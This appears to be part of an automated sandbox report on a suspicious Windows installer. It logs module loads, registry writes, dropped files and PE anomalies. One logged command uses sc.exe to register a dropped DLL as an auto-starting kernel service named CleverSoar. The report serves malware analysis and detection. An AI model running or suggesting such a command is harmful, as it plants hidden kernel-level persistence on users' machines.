Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exeStatic file information: File size 5707238 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000B.00000003.1818402436.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000B.00000003.1818525168.0000000003180000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.11.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AE57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,9_2_00AE57D0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exeStatic PE information: real checksum: 0x0 should be: 0x5724cd
Source: update.vac.1.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.5.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: tProtect.dll.11.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: hrsw.vbc.5.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.1.drStatic PE information: section name: .00cfg
Source: update.vac.1.drStatic PE information: section name: .voltbl
Source: update.vac.1.drStatic PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.drStatic PE information: section name: .didata
Source: 7zr.exe.5.drStatic PE information: section name: .sxdata
Source: is-RO25N.tmp.5.drStatic PE information: section name: .xdata
Source: hrsw.vbc.5.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.5.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.5.drStatic PE information: section name: .=~
Source: update.vac.5.drStatic PE information: section name: .00cfg
Source: update.vac.5.drStatic PE information: section name: .voltbl
Source: update.vac.5.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA086EB push ecx; ret 5_2_6CA086FE
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C8B0F00 push ss; retn 0001h5_2_6C8B0F0A
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAD6F10 push eax; ret 5_2_6CAD6F2E
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA3B9F4 push 004AC35Ch; ret 5_2_6CA3BA0E
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAD7290 push eax; ret 5_2_6CAD72BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A645F4 push 00B0C35Ch; ret 9_2_00A6460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AFFB10 push eax; ret 9_2_00AFFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AFFE90 push eax; ret 9_2_00AFFEBE
Source: update.vac.1.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.5.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.5.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-VGMC1.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\is-RO25N.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-VGMC1.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeFile created: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-O51CC.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeFile created: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-O51CC.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-VGMC1.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-O51CC.tmp\update.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
